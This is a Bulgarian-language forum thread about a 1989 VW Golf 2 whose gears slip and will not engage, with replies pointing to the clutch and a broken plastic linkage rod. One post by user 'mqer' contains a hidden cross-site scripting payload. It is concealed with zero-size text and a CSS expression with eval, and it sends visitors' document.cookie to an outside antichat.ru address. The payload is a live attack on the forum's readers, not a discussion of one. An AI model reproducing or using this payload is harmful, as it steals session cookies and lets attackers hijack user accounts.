Проблем скорости голф 2 1.8 моно 89-та

Техническа и сервизна информация за Golf, Vento, Jetta и Bora
tokoko
Автомобил:
Двигател:

Проблем скорости голф 2 1.8 моно 89-та

Мнениеот tokoko » Нед 21 окт 2007 16:58

Здр.Имам проблем със скоростите на трета ми изключва 4-та не иска да влиза трябва да вкарам първо 5-та че тогава чак и на задна не иска да потегли направо гасне като пусна съединителя :cry: /стана каточели изведнъж / и се чува по време на движение някакъ втранен звук отпред . Преди да се случи съединителя като го натиснех хъркаше леко там диска ли какво :? ако някои може да помогне ще съм му много благодарен :cry:

Потребителски аватар
fidrimku
Автомобил:
Двигател:

Мнениеот fidrimku » Нед 21 окт 2007 19:09

За хъркането преди това може би е трябвало да смениш съединителя. За трудното влизане на някои предавки причината може да е от лостовия механизъм но и от самата скоростна кутия(щом изключва някоя предавка). При всички положения ще трябва да свалиш кутията.Успех!

mqer
Автомобил:
Двигател:

hhh

Мнениеот mqer » Нед 21 окт 2007 21:26

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' kkk

Потребителски аватар
Yonata
Автомобил:
Двигател:

Мнениеот Yonata » Пон 22 окт 2007 8:32

fidrimku написа:За хъркането преди това може би е трябвало да смениш съединителя. За трудното влизане на някои предавки причината може да е от лостовия механизъм но и от самата скоростна кутия(щом изключва някоя предавка). При всички положения ще трябва да свалиш кутията.Успех!

При мен се беше счупила една щанга от лостовия механизъм. И не влизаше 5-та, а направо 3-та. Щангата е пластмасова около 6-8 см. сменихя и ок, само накои лев.

Върни се в “Golf, Vento, Jetta & Bora”